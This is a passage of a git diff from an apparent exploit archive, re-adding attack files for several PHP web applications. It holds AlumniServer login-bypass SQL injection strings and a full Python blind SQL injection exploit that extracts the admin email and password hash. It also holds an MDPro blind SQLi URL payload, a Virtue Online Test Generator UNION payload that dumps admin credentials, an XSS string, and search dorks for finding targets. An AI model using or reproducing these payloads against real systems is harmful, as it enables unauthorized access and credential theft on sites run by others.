** +** PROUD TO BE SPANISH! ** +** ** +*********************************************************************************************** +*********************************************************************************************** + +---------------------------------------------------------------------------------------------- +| SQL INJECTION VULNERABILITY | +|--------------------------------------------------------------------------------------------| +| | AlumniServer v-1.0.1 | | +| CMS INFORMATION: ------------------------------ | +| | +|-->WEB: http://www.alumniserver.net/ | +|-->DOWNLOAD: http://www.alumniserver.net/ | +|-->DEMO: N/A | +|-->CATEGORY: CMS/Education | +|-->DESCRIPTION: Open Source Alumni software, based on PHP+MySQL for universities, schools | +| and companies. Services for usersinclude profile page,... | +|-->RELEASED: 2009-06-11 | +| | +| CMS VULNERABILITY: | +| | +|-->TESTED ON: firefox 3 | +|-->DORK: "AlumniServer project" | +|-->CATEGORY: AUTH-BYPASS (SQLi) | +|-->AFFECT VERSION: CURRENT | +|-->Discovered Bug date: 2009-06-16 | +|-->Reported Bug date: 2009-06-16 | +|-->Fixed bug date: N/A | +|-->Info patch (????): N/A | +|-->Author: YEnH4ckEr | +|-->mail: y3nh4ck3r[at]gmail[dot]com | +|-->WEB/BLOG: N/A | +|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. | +|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) | +---------------------------------------------------------------------------------------------- + + + +##################### +//////////////////// + +AUTH-BYPASS (SQLi): + +//////////////////// +##################### + + + +<<<<---------++++++++++++++ Condition: magic quotes=OFF +++++++++++++++++--------->>>> + + + +----------- +VULN FILE: +----------- + + + +Path --> [HOME_PATH]/login.php +Lines --> 26, 32, 72 + + +//Note: requestVar is a function against LFI and XSS mainly, +//avoiding register_globals ON and filtering \r\n, \r, \0, etc and using htmlespecialchars. + + +... 
+ +26: $email=requestVar('login','',true); + +... + +32: $pwd=requestVar('password','',true); + +... + +72: $result=mysql_query("SELECT * FROM `as_users` WHERE (email LIKE '".$email."') AND (password LIKE '".md5($pwd)."') LIMIT 1",$dbh); <-- Vuln line + +... + + +----------- +EXPLOITS: +----------- + + + +[!!!] Case-1: If only one user (rarely)... + + +~~~> E-Mail=y3nh4ck3r@gmail.com') OR 1=1 /* +~~~> Password=nothing + + +[!!!] Case-2: If more users... + + +[++] Note: Search mail for admin (http://[HOST]/[PATH]/Imprint.php): + + +~~~> E-Mail=[real_admin_mail]')/* +~~~> Password=nothing + + +[++] Note: Search for first or second name. +[++] Note: AdminGn, AdminSn By default. Not use id because it's generated randomly. With a registered user + is easy to get necessary information. + + +~~~> E-Mail=y3nh4ck3r@gmail.com') OR gn='AdminGn' /* +~~~> Password=nothing + + +[!!!] Case-3: If admin is a hidden user... + + +~~~> E-Mail=y3nh4ck3r@gmail.com') OR hideuser='y' /* +~~~> Password=nothing + + + + +<<<-----------------------------EOF---------------------------------->>>ENJOY IT! + + + + +############################################################################## +############################################################################## +##**************************************************************************## +## SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)! 
## +##**************************************************************************## +##--------------------------------------------------------------------------## +##**************************************************************************## +## GREETZ TO: JosS, Ulises2k, J.McCray, Evil1 and Spanish Hack3Rs community!## +##**************************************************************************## +############################################################################## +############################################################################## + +# milw0rm.com [2009-06-25] diff --git a/platforms/php/webapps/9020.py b/platforms/php/webapps/9020.py index bb7a33a6f..24d737106 100755 --- a/platforms/php/webapps/9020.py +++ b/platforms/php/webapps/9020.py 
@@ -1,287 +1,287 @@ -#!/usr/bin/python -#*********************************************************************************************** -#*********************************************************************************************** -#** ** -#** ** -#** [] [] [] [][][][> [] [] [][ ][] [] [][]] [] [> [][][][> [][][][] ** -#** || || || [] [][] [] [] [] [] [] [] [] [] [] [] ** -# [> [][][][] [][][][> [] [] [] [] [] [][] [] [][] [][][][> [] [] ** -#** [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\ -#**==[> [] [] [] [][] [] [] [][][] [] [][] [] [] [] >>-- -#** [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ -# [> [[[]]] [][][][> [][] [] [][[] [[]] [][] [][][] [] [> [][][][> <][] [] -#** ** -#** ** -#** VIVA SPAIN!... GANAREMOS EL MUNDIAL!...o.O ** -#** PROUD TO BE SPANISH! ** -#** ** -#*********************************************************************************************** -#*********************************************************************************************** -# -#--------------------------------------------------------------------------------------------- -#| (POST var 'resetpwemail') BLIND SQL INJECTION EXPLOIT | -#|-------------------------------------------------------------------------------------------| -#| | AlumniServer v-1.0.1 | | -#| CMS INFORMATION: ------------------------------ | -#| | -#|-->WEB: http://www.alumniserver.net/ | -#|-->DOWNLOAD: http://www.alumniserver.net/ | -#|-->DEMO: N/A | -#|-->CATEGORY: CMS/Education | -#|-->DESCRIPTION: Open Source Alumni software, based on PHP+MySQL for universities, schools | -#| and companies. Services for usersinclude profile page,... 
| -#|-->RELEASED: 2009-06-11 | -#| | -#| CMS VULNERABILITY: | -#| | -#|-->TESTED ON: Python 2.6 | -#|-->DORK: "AlumniServer project" | -#|-->CATEGORY: BSQLi PYTHON EXPLOIT | -#|-->AFFECT VERSION: CURRENT | -#|-->Discovered Bug date: 2009-06-15 | -#|-->Reported Bug date: 2009-06-15 | -#|-->Fixed bug date: N/A | -#|-->Info patch (????): N/A | -#|-->Author: YEnH4ckEr | -#|-->mail: y3nh4ck3r[at]gmail[dot]com | -#|-->WEB/BLOG: N/A | -#|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. | -#|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) | -#--------------------------------------------------------------------------------------------- -# -#------------ -#CONDITIONS: -#------------ -# -#magic quotes=OFF -# -#------- -#NEED: -#------- -# -#Valid email -# -#--------------------------------------- -#PROOF OF CONCEPT (SQL INJECTION): -#--------------------------------------- -# -#POST http://[HOST]/[PATH]/Password.php HTTP/1.1 -#Host: [HOST] -#Referer: http://[HOST]/[PATH]/Password.php -#Content-Type: application/x-www-form-urlencoded -# -#resetpwemail=[valid_mail]%27+and+1%3D%270 --> FALSE -#resetpwemail=[valid_mail]%27+and+1%3D%271 --> TRUE -# -#Other P0C (with a registered user): -# -#http://[HOST]/[PATH]/Profile.php?id=[valid_id]%27+AND+1=0%23 -->FALSE -#http://[HOST]/[PATH]/Profile.php?id=[valid_id]%27+AND+1=1%23 -->TRUE -# -#-------------- -#WATCH VIDEOS -#-------------- -# -# BSQLi --> http://www.youtube.com/watch?v=K3z7iyHttBw -# -# AUTH BYPASS --> http://www.youtube.com/watch?v=UjDm2p7qHj0 -# -# -############################################################################## -############################################################################## -##**************************************************************************## -## SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)! 
## -##**************************************************************************## -##--------------------------------------------------------------------------## -##**************************************************************************## -## GREETZ TO: JosS, Ulises2k, J.McCray, Evil1 and Spanish Hack3Rs community!## -##**************************************************************************## -############################################################################## -############################################################################## -# -#Used modules -import urllib2,sys,re,os -#Defined functions -def init(): - if(sys.platform=='win32'): - os.system("cls") - os.system ("title AlumniServer v-1.0.1 Blind SQL Injection Exploit") - os.system ("color 02") - else: - os.system("clear") - - print "\t#######################################################\n\n" - print "\t#######################################################\n\n" - print "\t## AlumniServer v-1.0.1 Blind SQLi Exploit ##\n\n" - print "\t## ++Conditions: magic_quotes=OFF ##\n\n" - print "\t## ++Needed: Valid mail ##\n\n" - print "\t## Author: Y3nh4ck3r ##\n\n" - print "\t## Contact:y3nh4ck3r[at]gmail[dot]com ##\n\n" - print "\t## Proud to be Spanish! 
##\n\n" - print "\t#######################################################\n\n" - print "\t#######################################################\n\n" - -def request(urltarget,postmsg): - req=urllib2.Request(url=urltarget,data=postmsg) - conn = urllib2.urlopen(req) - outcode=conn.read() - #print outcode #--> Active this line for debugger mode - return outcode - -def error(): - print "\t------------------------------------------------------------\n" - print "\tWeb isn't vulnerable!\n\n" - print "\t--->Maybe:\n\n" - print "\t\t1.-Patched.\n" - print "\t\t2.-Bad path or host.\n" - print "\t\t3.-Bad mail.\n" - print "\t\t4.-Magic quotes ON.\n" - print "\t\tEXPLOIT FAILED!\n" - print "\t------------------------------------------------------------\n" - sys.exit() - -def testedblindsql(): - print "\t-----------------------------------------------------------------\n" - print "\tWEB MAYBE BE VULNERABLE!\n\n" - print "\tTested Blind SQL Injection.\n" - print "\tStarting exploit...\n" - print "\t-----------------------------------------------------------------\n\n" - -def helper(filename): - print "\n\t[!!!] AlumniServer v-1.0.1 Blind SQL Injection Exploit\n" - print "\t[!!!] USAGE MODE: [!!!]\n" - print "\t[!!!] python "+filename+" [HOST] [PATH] [MAIL] [ID_ADMIN/HIDDEN/BRUTEFORCEID]\n" - print "\t[!!!] [HOST]: Web.\n" - print "\t[!!!] [PATH]: Home Path.\n" - print "\t[!!!] [MAIL]: Mail for fish\n" - print "\t[!!!] [ID_ADMIN/HIDDEN/BRUTEFORCEID]: Id_admin if we are registered users or 'hidden' value if admin is hidden.\n" - print "\t[!!!] Also can use 'bruteforceid' value for bruteforce admin id previously.\n" - print "\t[!!!] Example: python "+filename+" www.example.com demo y3nh4ck3r@gmail.com cd54cd7df99a\n" - print "\t[!!!] Example: python "+filename+" www.example.com demo y3nh4ck3r@gmail.com hidden\n" - print "\t[!!!] 
Example: python "+filename+" www.example.com demo y3nh4ck3r@gmail.com bruteforceid\n" - sys.exit() - -def brute_length(urlrequest, idadmin, mail): - #Username length - flag=1 - i=0 - while(flag==1): - i=i+1 - if(idadmin=="hidden"): - blindsql="resetpwemail="+mail+"'+AND+(SELECT+length(email)+FROM+as_users+WHERE+hideuser='y')='"+str(i) #injected code - else: - blindsql="resetpwemail="+mail+"'+AND+(SELECT+length(email)+FROM+as_users+WHERE+id='"+idadmin+"')='"+str(i) #injected code - output=request(urlrequest, blindsql) - if(re.search("You will receive an email shortly with a link that enables you to reset your password.",output)): - flag=2 - else: - flag=1 - #This is the max length of email - if (i>50): - error() - #Save column length - length=i - print "\t<<<<<--------------------------------------------------------->>>>>\n" - print "\tLength catched!\n" - print "\tLength E-mail --> "+str(length)+"\n" - print "\tWait several minutes...\n" - print "\t<<<<<--------------------------------------------------------->>>>>\n\n" - return length -def exploiting (lengthvalue, urlrequest, column, idadmin, mail): - #Bruteforcing values - values="" - k=1 - z=32 - while((k<=lengthvalue) and (z<=126)): - #Choose method, hidden or with id - if(idadmin=="hidden"): - blindsql="resetpwemail="+mail+"'+AND+ascii(substring((SELECT+"+column+"+FROM+as_users+WHERE+hideuser='y'),"+str(k)+",1))='"+str(z) #injected code - else: - blindsql="resetpwemail="+mail+"'+AND+ascii(substring((SELECT+"+column+"+FROM+as_users+WHERE+id='"+idadmin+"'),"+str(k)+",1))='"+str(z) #injected code - output=request(urlrequest, blindsql) - if(re.search("You will receive an email shortly with a link that enables you to reset your password.",output)): - values=values+chr(z) - k=k+1 - z=32 -#new char - z=z+1 - return values - -def exploiting_id (urlrequest, mail): - #Bruteforcing values - values="" - #Possible values of id - arrayids=[0,1,2,3,4,5,6,7,8,9,'a','b','c','d','e','f'] - k=1 - #Max length of id = 12 - 
while(k<=12):
- for z in arrayids:
- blindsql="resetpwemail="+mail+"'+AND+substring((SELECT+id+FROM+as_users+HAVING+MIN(membersince)),"+str(k)+",1)='"+str(z) #injected code
- output=request(urlrequest, blindsql)
- if(re.search("You will receive an email shortly with a link that enables you to reset your password.",output)):
- values=values+str(z)
- k=k+1
- z='g'
- return values
-#Main
-init()
-#Init variables
-if(len(sys.argv) <= 4):
- helper(sys.argv[0])
-
-host=sys.argv[1]
-path=sys.argv[2]
-mail=sys.argv[3]
-#Define mode: ID, hidden or bruteforceid
-if(sys.argv[4]=="hidden"):
- mode="hidden"
-elif(sys.argv[4]=="bruteforceid"):
- mode="bruteforceid"
-else:
- mode="usual"
- idadmin=sys.argv[4]
-
-finalrequest="http://"+host+"/"+path+"/Password.php"
-testblind1="resetpwemail="+mail+"%27+and+1%3D%271" #Return true
-outcode1=request(finalrequest,testblind1)
-testblind2="resetpwemail="+mail+"%27+and+1%3D%270" #Return false
-outcode2=request(finalrequest,testblind2)
-#Check BSQLi
-if(outcode1==outcode2):
- error()
-else:
- testedblindsql()
-if(mode=="usual"):
- #Catching length of admin email
- lengthadmin=brute_length(finalrequest, idadmin, mail)
- mailadmin=exploiting(lengthadmin, finalrequest, "email", idadmin, mail)
- #Catching value of password (hashed md5)
- passwordhash=exploiting(32, finalrequest, "password", idadmin, mail)
-elif(mode=="hidden"):
- #Catching length of admin email
- lengthadmin=brute_length(finalrequest, "hidden", mail)
- mailadmin=exploiting(lengthadmin, finalrequest, "email", "hidden", mail)
- #Catching value of password (hashed md5)
- passwordhash=exploiting(32, finalrequest, "password", "hidden", mail)
-else:
- print "\t<<<<<--------------------------------------------------------->>>>>\n"
- print "\tBruteforcing id. 
Wait a few minutes...\n" - print "\t<<<<<--------------------------------------------------------->>>>>\n\n" - #Catching value of admin id - idadmin=exploiting_id(finalrequest, mail) - -print "\n\t\t*************************************************\n" -print "\t\t********* EXPLOIT EXECUTED SUCCESSFULLY ********\n" -print "\t\t*************************************************\n\n" -#Mode usual and hidden -if((mode=="usual") or (mode=="hidden")): - print "\t\tAdmin-mail: "+mailadmin+"\n\n" - print "\t\tPassword hash: "+passwordhash+"\n\n" -else: -#Mode bruteforceid - print "\t\tAdmin-id: "+idadmin+"\n\n" -print "\n\t\t<<----------------------FINISH!-------------------->>\n\n" -print "\t\t<<---------------Thanks to: y3nh4ck3r-------------->>\n\n" -print "\t\t<<------------------------EOF---------------------->>\n\n" - -# milw0rm.com [2009-06-25] +#!/usr/bin/python +#*********************************************************************************************** +#*********************************************************************************************** +#** ** +#** ** +#** [] [] [] [][][][> [] [] [][ ][] [] [][]] [] [> [][][][> [][][][] ** +#** || || || [] [][] [] [] [] [] [] [] [] [] [] [] ** +# [> [][][][] [][][][> [] [] [] [] [] [][] [] [][] [][][][> [] [] ** +#** [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\ +#**==[> [] [] [] [][] [] [] [][][] [] [][] [] [] [] >>-- +#** [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ +# [> [[[]]] [][][][> [][] [] [][[] [[]] [][] [][][] [] [> [][][][> <][] [] +#** ** +#** ** +#** VIVA SPAIN!... GANAREMOS EL MUNDIAL!...o.O ** +#** PROUD TO BE SPANISH! 
** +#** ** +#*********************************************************************************************** +#*********************************************************************************************** +# +#--------------------------------------------------------------------------------------------- +#| (POST var 'resetpwemail') BLIND SQL INJECTION EXPLOIT | +#|-------------------------------------------------------------------------------------------| +#| | AlumniServer v-1.0.1 | | +#| CMS INFORMATION: ------------------------------ | +#| | +#|-->WEB: http://www.alumniserver.net/ | +#|-->DOWNLOAD: http://www.alumniserver.net/ | +#|-->DEMO: N/A | +#|-->CATEGORY: CMS/Education | +#|-->DESCRIPTION: Open Source Alumni software, based on PHP+MySQL for universities, schools | +#| and companies. Services for usersinclude profile page,... | +#|-->RELEASED: 2009-06-11 | +#| | +#| CMS VULNERABILITY: | +#| | +#|-->TESTED ON: Python 2.6 | +#|-->DORK: "AlumniServer project" | +#|-->CATEGORY: BSQLi PYTHON EXPLOIT | +#|-->AFFECT VERSION: CURRENT | +#|-->Discovered Bug date: 2009-06-15 | +#|-->Reported Bug date: 2009-06-15 | +#|-->Fixed bug date: N/A | +#|-->Info patch (????): N/A | +#|-->Author: YEnH4ckEr | +#|-->mail: y3nh4ck3r[at]gmail[dot]com | +#|-->WEB/BLOG: N/A | +#|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. | +#|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) 
| +#--------------------------------------------------------------------------------------------- +# +#------------ +#CONDITIONS: +#------------ +# +#magic quotes=OFF +# +#------- +#NEED: +#------- +# +#Valid email +# +#--------------------------------------- +#PROOF OF CONCEPT (SQL INJECTION): +#--------------------------------------- +# +#POST http://[HOST]/[PATH]/Password.php HTTP/1.1 +#Host: [HOST] +#Referer: http://[HOST]/[PATH]/Password.php +#Content-Type: application/x-www-form-urlencoded +# +#resetpwemail=[valid_mail]%27+and+1%3D%270 --> FALSE +#resetpwemail=[valid_mail]%27+and+1%3D%271 --> TRUE +# +#Other P0C (with a registered user): +# +#http://[HOST]/[PATH]/Profile.php?id=[valid_id]%27+AND+1=0%23 -->FALSE +#http://[HOST]/[PATH]/Profile.php?id=[valid_id]%27+AND+1=1%23 -->TRUE +# +#-------------- +#WATCH VIDEOS +#-------------- +# +# BSQLi --> http://www.youtube.com/watch?v=K3z7iyHttBw +# +# AUTH BYPASS --> http://www.youtube.com/watch?v=UjDm2p7qHj0 +# +# +############################################################################## +############################################################################## +##**************************************************************************## +## SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)! 
## +##**************************************************************************## +##--------------------------------------------------------------------------## +##**************************************************************************## +## GREETZ TO: JosS, Ulises2k, J.McCray, Evil1 and Spanish Hack3Rs community!## +##**************************************************************************## +############################################################################## +############################################################################## +# +#Used modules +import urllib2,sys,re,os +#Defined functions +def init(): + if(sys.platform=='win32'): + os.system("cls") + os.system ("title AlumniServer v-1.0.1 Blind SQL Injection Exploit") + os.system ("color 02") + else: + os.system("clear") + + print "\t#######################################################\n\n" + print "\t#######################################################\n\n" + print "\t## AlumniServer v-1.0.1 Blind SQLi Exploit ##\n\n" + print "\t## ++Conditions: magic_quotes=OFF ##\n\n" + print "\t## ++Needed: Valid mail ##\n\n" + print "\t## Author: Y3nh4ck3r ##\n\n" + print "\t## Contact:y3nh4ck3r[at]gmail[dot]com ##\n\n" + print "\t## Proud to be Spanish! 
##\n\n" + print "\t#######################################################\n\n" + print "\t#######################################################\n\n" + +def request(urltarget,postmsg): + req=urllib2.Request(url=urltarget,data=postmsg) + conn = urllib2.urlopen(req) + outcode=conn.read() + #print outcode #--> Active this line for debugger mode + return outcode + +def error(): + print "\t------------------------------------------------------------\n" + print "\tWeb isn't vulnerable!\n\n" + print "\t--->Maybe:\n\n" + print "\t\t1.-Patched.\n" + print "\t\t2.-Bad path or host.\n" + print "\t\t3.-Bad mail.\n" + print "\t\t4.-Magic quotes ON.\n" + print "\t\tEXPLOIT FAILED!\n" + print "\t------------------------------------------------------------\n" + sys.exit() + +def testedblindsql(): + print "\t-----------------------------------------------------------------\n" + print "\tWEB MAYBE BE VULNERABLE!\n\n" + print "\tTested Blind SQL Injection.\n" + print "\tStarting exploit...\n" + print "\t-----------------------------------------------------------------\n\n" + +def helper(filename): + print "\n\t[!!!] AlumniServer v-1.0.1 Blind SQL Injection Exploit\n" + print "\t[!!!] USAGE MODE: [!!!]\n" + print "\t[!!!] python "+filename+" [HOST] [PATH] [MAIL] [ID_ADMIN/HIDDEN/BRUTEFORCEID]\n" + print "\t[!!!] [HOST]: Web.\n" + print "\t[!!!] [PATH]: Home Path.\n" + print "\t[!!!] [MAIL]: Mail for fish\n" + print "\t[!!!] [ID_ADMIN/HIDDEN/BRUTEFORCEID]: Id_admin if we are registered users or 'hidden' value if admin is hidden.\n" + print "\t[!!!] Also can use 'bruteforceid' value for bruteforce admin id previously.\n" + print "\t[!!!] Example: python "+filename+" www.example.com demo y3nh4ck3r@gmail.com cd54cd7df99a\n" + print "\t[!!!] Example: python "+filename+" www.example.com demo y3nh4ck3r@gmail.com hidden\n" + print "\t[!!!] 
Example: python "+filename+" www.example.com demo y3nh4ck3r@gmail.com bruteforceid\n" + sys.exit() + +def brute_length(urlrequest, idadmin, mail): + #Username length + flag=1 + i=0 + while(flag==1): + i=i+1 + if(idadmin=="hidden"): + blindsql="resetpwemail="+mail+"'+AND+(SELECT+length(email)+FROM+as_users+WHERE+hideuser='y')='"+str(i) #injected code + else: + blindsql="resetpwemail="+mail+"'+AND+(SELECT+length(email)+FROM+as_users+WHERE+id='"+idadmin+"')='"+str(i) #injected code + output=request(urlrequest, blindsql) + if(re.search("You will receive an email shortly with a link that enables you to reset your password.",output)): + flag=2 + else: + flag=1 + #This is the max length of email + if (i>50): + error() + #Save column length + length=i + print "\t<<<<<--------------------------------------------------------->>>>>\n" + print "\tLength catched!\n" + print "\tLength E-mail --> "+str(length)+"\n" + print "\tWait several minutes...\n" + print "\t<<<<<--------------------------------------------------------->>>>>\n\n" + return length +def exploiting (lengthvalue, urlrequest, column, idadmin, mail): + #Bruteforcing values + values="" + k=1 + z=32 + while((k<=lengthvalue) and (z<=126)): + #Choose method, hidden or with id + if(idadmin=="hidden"): + blindsql="resetpwemail="+mail+"'+AND+ascii(substring((SELECT+"+column+"+FROM+as_users+WHERE+hideuser='y'),"+str(k)+",1))='"+str(z) #injected code + else: + blindsql="resetpwemail="+mail+"'+AND+ascii(substring((SELECT+"+column+"+FROM+as_users+WHERE+id='"+idadmin+"'),"+str(k)+",1))='"+str(z) #injected code + output=request(urlrequest, blindsql) + if(re.search("You will receive an email shortly with a link that enables you to reset your password.",output)): + values=values+chr(z) + k=k+1 + z=32 +#new char + z=z+1 + return values + +def exploiting_id (urlrequest, mail): + #Bruteforcing values + values="" + #Possible values of id + arrayids=[0,1,2,3,4,5,6,7,8,9,'a','b','c','d','e','f'] + k=1 + #Max length of id = 12 + 
while(k<=12):
+ for z in arrayids:
+ blindsql="resetpwemail="+mail+"'+AND+substring((SELECT+id+FROM+as_users+HAVING+MIN(membersince)),"+str(k)+",1)='"+str(z) #injected code
+ output=request(urlrequest, blindsql)
+ if(re.search("You will receive an email shortly with a link that enables you to reset your password.",output)):
+ values=values+str(z)
+ k=k+1
+ z='g'
+ return values
+#Main
+init()
+#Init variables
+if(len(sys.argv) <= 4):
+ helper(sys.argv[0])
+
+host=sys.argv[1]
+path=sys.argv[2]
+mail=sys.argv[3]
+#Define mode: ID, hidden or bruteforceid
+if(sys.argv[4]=="hidden"):
+ mode="hidden"
+elif(sys.argv[4]=="bruteforceid"):
+ mode="bruteforceid"
+else:
+ mode="usual"
+ idadmin=sys.argv[4]
+
+finalrequest="http://"+host+"/"+path+"/Password.php"
+testblind1="resetpwemail="+mail+"%27+and+1%3D%271" #Return true
+outcode1=request(finalrequest,testblind1)
+testblind2="resetpwemail="+mail+"%27+and+1%3D%270" #Return false
+outcode2=request(finalrequest,testblind2)
+#Check BSQLi
+if(outcode1==outcode2):
+ error()
+else:
+ testedblindsql()
+if(mode=="usual"):
+ #Catching length of admin email
+ lengthadmin=brute_length(finalrequest, idadmin, mail)
+ mailadmin=exploiting(lengthadmin, finalrequest, "email", idadmin, mail)
+ #Catching value of password (hashed md5)
+ passwordhash=exploiting(32, finalrequest, "password", idadmin, mail)
+elif(mode=="hidden"):
+ #Catching length of admin email
+ lengthadmin=brute_length(finalrequest, "hidden", mail)
+ mailadmin=exploiting(lengthadmin, finalrequest, "email", "hidden", mail)
+ #Catching value of password (hashed md5)
+ passwordhash=exploiting(32, finalrequest, "password", "hidden", mail)
+else:
+ print "\t<<<<<--------------------------------------------------------->>>>>\n"
+ print "\tBruteforcing id. 
Wait a few minutes...\n"
+ print "\t<<<<<--------------------------------------------------------->>>>>\n\n"
+ #Catching value of admin id
+ idadmin=exploiting_id(finalrequest, mail)
+
+print "\n\t\t*************************************************\n"
+print "\t\t********* EXPLOIT EXECUTED SUCCESSFULLY ********\n"
+print "\t\t*************************************************\n\n"
+#Mode usual and hidden
+if((mode=="usual") or (mode=="hidden")):
+ print "\t\tAdmin-mail: "+mailadmin+"\n\n"
+ print "\t\tPassword hash: "+passwordhash+"\n\n"
+else:
+#Mode bruteforceid
+ print "\t\tAdmin-id: "+idadmin+"\n\n"
+print "\n\t\t<<----------------------FINISH!-------------------->>\n\n"
+print "\t\t<<---------------Thanks to: y3nh4ck3r-------------->>\n\n"
+print "\t\t<<------------------------EOF---------------------->>\n\n"
+
+# milw0rm.com [2009-06-25]
diff --git a/platforms/php/webapps/9021.txt b/platforms/php/webapps/9021.txt
index 2a44a2e0c..917abadc5 100755
--- a/platforms/php/webapps/9021.txt
+++ b/platforms/php/webapps/9021.txt
@@ -1,38 +1,38 @@
-[!]Information_schema:
-
-[Product: MDPro v 1.083.x ]
-[site: www.maxdev.com ]
-[Vuln: Blind $QL Injection (pollID) ]
-[Author: XaDoS ~ thanks to S3rg3770 ]
-[dork: inurl:modules.php?op= "pollID"]
-[ "Powered By MDPro" ]
-
-[~] Vuln: (PollID)
-
-http://www.site.com/[MDPro_path]/modules.php?name=Surveys&op=results&pollID=[SQL]
-or
-http://www.site.com/[MDPro_path]/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=[SQL]
-
-[~] DeMo:
-
-For example, if yuo want see the version of MySql write:
-
-http://www.site.com/[MDPro_path]/modules.php?name=Surveys&op=results&pollID=+and+substring(@@version,1,1)=5#
-
-Like:
-
-http://www.xxx.it/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=73+and+substring(@@version,1,1)=5# [work]
-so v => 5.0.0 (this site have 96 databases) :)
-
-[~] Note:
-
-If yuo want exploit for this vuln write it by yuorself. I'm really Busy.
-
-thanks to s3rg3770 and warwolfz Crew
-
-
-\*Everything that gives pleasure has its reason. 
To scorn the mobs of those who go astray is not the means to bring them around*/ C.Baudelaire
-
-Have Fun :D
-
-# milw0rm.com [2009-06-25]
+[!]Information_schema:
+
+[Product: MDPro v 1.083.x ]
+[site: www.maxdev.com ]
+[Vuln: Blind $QL Injection (pollID) ]
+[Author: XaDoS ~ thanks to S3rg3770 ]
+[dork: inurl:modules.php?op= "pollID"]
+[ "Powered By MDPro" ]
+
+[~] Vuln: (PollID)
+
+http://www.site.com/[MDPro_path]/modules.php?name=Surveys&op=results&pollID=[SQL]
+or
+http://www.site.com/[MDPro_path]/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=[SQL]
+
+[~] DeMo:
+
+For example, if yuo want see the version of MySql write:
+
+http://www.site.com/[MDPro_path]/modules.php?name=Surveys&op=results&pollID=+and+substring(@@version,1,1)=5#
+
+Like:
+
+http://www.xxx.it/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=73+and+substring(@@version,1,1)=5# [work]
+so v => 5.0.0 (this site have 96 databases) :)
+
+[~] Note:
+
+If yuo want exploit for this vuln write it by yuorself. I'm really Busy.
+
+thanks to s3rg3770 and warwolfz Crew
+
+
+\*Everything that gives pleasure has its reason. To scorn the mobs of those who go astray is not the means to bring them around*/ C.Baudelaire
+
+Have Fun :D
+
+# milw0rm.com [2009-06-25]
diff --git a/platforms/php/webapps/9022.txt b/platforms/php/webapps/9022.txt
index 3e4bc9159..bfe8a53c7 100755
--- a/platforms/php/webapps/9022.txt
+++ b/platforms/php/webapps/9022.txt
@@ -1,45 +1,44 @@
-
-+===================================================================================+
-| |
-| Virtue Online Test Generator (AB/SQL/XSS) Multiple Remote Vulnerabilities |
-| |
-+===================================================================================+
-| |
-| Author.: HxH |
-| Contact: HxH[at]live[dot]at |
-| |
-+===================================================================================+
-| |
-| Script.: Virtue Online Test Generator |
-| Home...: http://www.virtuenetz.com/virtue_test_generator.php |
-| |
-+-----------------------------------------------------------------------------------+
-| |
-| Exploit: After user login |
-| |
-| [+] Auth Bypass |
-| |
-| http://[website]/[script]/admin/index.php |
-| |
-| [+] SQLi |
-| |
-| http://[website]/[script]/text.php?tid=[SQL] |
-| |
-| [SQL]=null+union+select+1,2,concat(user_name,0x3a,user_pass)+from+admin-- |
-| |
-| [+] XSS |
-| |
-| http://[website]/[script]/text.php?tid=<script>alert(1)</script> |
-| |
-+-----------------------------------------------------------------------------------+
-| |
-| Demo...: http://www.virtuenetz.com/exam |
-| Usrinfo: E-mail:demo@virtuenetz.com ~ Pass:demo |
-| |
-+===================================================================================+
-| |
-| Greetz.: ~ Jiko ~ Sniper Code ~ T3rr0rist |
-| |
-+===================================================================================+
-
-# milw0rm.com [2009-06-26]
++===================================================================================+
+| |
+| Virtue Online Test Generator (AB/SQL/XSS) Multiple Remote Vulnerabilities |
+| |
++===================================================================================+
+| |
+| Author.: HxH |
+| Contact: HxH[at]live[dot]at |
+| |
++===================================================================================+
+| |
+| Script.: Virtue Online Test Generator |
+| Home...: http://www.virtuenetz.com/virtue_test_generator.php |
+| |
++-----------------------------------------------------------------------------------+
+| |
+| Exploit: After user login |
+| |
+| [+] Auth Bypass |
+| |
+| http://[website]/[script]/admin/index.php |
+| |
+| [+] SQLi |
+| |
+| http://[website]/[script]/text.php?tid=[SQL] |
+| |
+| [SQL]=null+union+select+1,2,concat(user_name,0x3a,user_pass)+from+admin-- |
+| |
+| [+] XSS |
+| |
+| http://[website]/[script]/text.php?tid=<script>alert(1)</script> |
+| |
++-----------------------------------------------------------------------------------+
+| |
+| Demo...: http://www.virtuenetz.com/exam |
+| Usrinfo: E-mail:demo@virtuenetz.com ~ Pass:demo |
+| |
++===================================================================================+
+| |
+| Greetz.: ~ Jiko ~ Sniper Code ~ T3rr0rist |
+| |
++===================================================================================+
+
+# milw0rm.com [2009-06-26]
diff --git a/platforms/php/webapps/9023.txt b/platforms/php/webapps/9023.txt
index 66711cb9c..d0def7674 100755
--- a/platforms/php/webapps/9023.txt
+++ b/platforms/php/webapps/9023.txt
